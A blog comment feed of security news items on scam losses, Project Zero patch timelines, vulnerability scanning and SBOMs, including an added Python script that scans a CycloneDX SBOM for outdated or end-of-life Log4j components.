About 25% of losses from scams reported to the FTC last year were paid in cryptocurrency, with the median individual cryptocurrency loss at $9,770, and the agency said a growing number of scammers have tricked victims with fake cryptocurrency investment advice.
Though reports of romance scams increased for every age group, the increase was greatest for people ages 18 to 29, though people in that group reported a median loss of only $750, compared to $9,000 among people age 70 and up, the group for whom losses were greatest.
Though the number of cryptocurrency-related scams grew almost fivefold from 2020 to 2021, gift or reload cards were the most frequent method of payment, used in about 28% of last year’s scams, compared to cryptocurrency at 18%, payment apps or services at 14%, bank transfers or payments at 13% and wire transfers at 12%, according to the FTC.
Tomi Engdahl says:
Vulnerabilities Found by Google Researchers in 2021 Got Patched on Average in 52 Days
https://www.securityweek.com/vulnerabilities-found-google-researchers-2021-got-patched-average-52-days
Google’s Project Zero has observed a decrease in the overall time vendors need to address vulnerabilities reported by the bug hunting team.
Between 2019 and 2021, the team reported a total of 376 vulnerabilities and saw most of them (351) get patched. Of the remaining flaws, 14 are marked “WontFix” by the vendor and 11 remain unfixed.
Per Google Project Zero’s policy, vendors have 90 days to address the security errors, but they can also request a 14-day grace period if a patch will be shipped within that 104-day window.
Out of a sample of 346 vulnerabilities reported and patched between 2019 and 2021, the majority were patched within that window, with only 5% exceeding the deadline and grace period.
Last year, vendors needed an average of 52 days to address the reported issues, down from 54 days in 2020 and 67 days in 2019.
“We can see a few things: first of all, the overall time to fix has consistently been decreasing, but most significantly between 2019 and 2020,” Google Project Zero says.
“Vendors are fixing almost all of the bugs that they receive, and they generally do it within the 90-day deadline plus the 14-day grace period when needed. Over the past three years vendors have, for the most part, accelerated their patch effectively reducing the overall average time to fix to about 52 days,” the team says.
However, Project Zero also points out that vendors might be rushing to release patches to avoid the risk of public disclosure when the deadline is reached, and encourages vendors to release metrics to paint a better picture of how quickly vulnerabilities are being addressed across the industry.
https://googleprojectzero.blogspot.com/2022/02/a-walk-through-project-zero-metrics.html
Tomi Engdahl says:
https://www.iflscience.com/technology/mark-zuckerberg-warns-not-to-screenshot-your-facebook-chats/
Tomi Engdahl says:
Vulnerability Scanning Triples, Leading to Two-Thirds Fewer Flaws
Companies are scanning more applications for vulnerabilities — and more often.
https://www.darkreading.com/application-security/vulnerability-scanning-triples-leading-to-two-third-fewer-flaws
Tomi Engdahl says:
Log4j and the Role of SBOMs in Reducing Software Security Risk
Enterprises are spending a pittance on securing their software supply chain, which makes COTS software dangerous — vulnerabilities can be “hidden” in open source components.
https://www.darkreading.com/vulnerabilities-threats/log4j-and-the-role-of-sboms-in-reducing-software-security-risk
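The point of an SBOM is that the "hidden" log4j-core inside a vendor's WAR is a lookup rather than a hunt. The script below is an added example, not code from the Dark Reading piece or from the CycloneDX project: it walks a CycloneDX JSON document, including components nested inside other components, and flags log4j-core below a fixed-version threshold and any Log4j 1.x (unmaintained since 2015). The SBOM is constructed; the 2.17.1 threshold is the release Apache published at the end of December 2021 after the CVE-2021-44228 series and is a parameter you should set from the current advisory rather than trust from this example.

```python
"""Find vulnerable or end-of-life Log4j components in a CycloneDX JSON SBOM (added example).

Walks nested components (CycloneDX lets a component carry its own
components), so a log4j-core bundled inside a vendor WAR is found too.
The SBOM is constructed; the fixed-version threshold is an assumption
taken from Apache's late-December 2021 releases and should be set from
the current advisory.
"""
import json
import re

LOG4J2_GROUP = "org.apache.logging.log4j"
FIXED = (2, 17, 1)  # assumption for this example; verify against the current Apache advisory


def parse_version(v: str) -> tuple[int, ...]:
    """'2.17.1-rc1' -> (2, 17, 1); non-numeric parts are dropped."""
    core = re.split(r"[-+]", v, maxsplit=1)[0]
    return tuple(int(p) for p in core.split(".") if p.isdigit())


def walk(components):
    """Depth-first over a CycloneDX components list and every nested components list."""
    for c in components or []:
        yield c
        yield from walk(c.get("components"))


def find_log4j(sbom: dict, fixed=FIXED) -> list[tuple[str, str]]:
    """Return (identifier, finding) for log4j-core below `fixed` and for any Log4j 1.x."""
    findings = []
    for c in walk(sbom.get("components")):
        group, name, version = c.get("group", ""), c.get("name", ""), c.get("version", "")
        ident = c.get("purl") or f"{group}:{name}@{version}"
        if group == LOG4J2_GROUP and name == "log4j-core":
            if parse_version(version) < fixed:
                findings.append((ident, "below-fixed-version"))
        elif group == "log4j" and name == "log4j":
            findings.append((ident, "log4j-1.x-eol"))  # 1.x has been end-of-life since 2015
    return findings


# Constructed SBOM: an application that bundles log4j-core 2.14.1, a patched
# top-level log4j-core 2.17.1, and a stray Log4j 1.x jar.
SAMPLE_SBOM_JSON = """
{
  "bomFormat": "CycloneDX",
  "specVersion": "1.4",
  "components": [
    {"type": "application", "name": "shop-api", "version": "1.0.0",
     "components": [
       {"type": "library", "group": "org.apache.logging.log4j", "name": "log4j-core", "version": "2.14.1",
        "purl": "pkg:maven/org.apache.logging.log4j/log4j-core@2.14.1"},
       {"type": "library", "group": "org.apache.logging.log4j", "name": "log4j-api", "version": "2.14.1",
        "purl": "pkg:maven/org.apache.logging.log4j/log4j-api@2.14.1"}
     ]},
    {"type": "library", "group": "org.apache.logging.log4j", "name": "log4j-core", "version": "2.17.1",
     "purl": "pkg:maven/org.apache.logging.log4j/log4j-core@2.17.1"},
    {"type": "library", "group": "log4j", "name": "log4j", "version": "1.2.17",
     "purl": "pkg:maven/log4j/log4j@1.2.17"}
  ]
}
"""


def load_sample() -> dict:
    return json.loads(SAMPLE_SBOM_JSON)


if __name__ == "__main__":
    for ident, finding in find_log4j(load_sample()):
        print(f"{finding:20} {ident}")
```

Note what the nested walk buys you: the vulnerable copy lives inside the shop-api component, which is the case the article describes as "hidden"; a flat scan of top-level components would report the system clean because the only top-level log4j-core is already patched.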
Tomi Engdahl says:
Intel Owl- Open Source Cyber Threat Intelligence Project
https://hackersonlineclub.com/intelowl-open-source-cyber-threat-intelligence-project/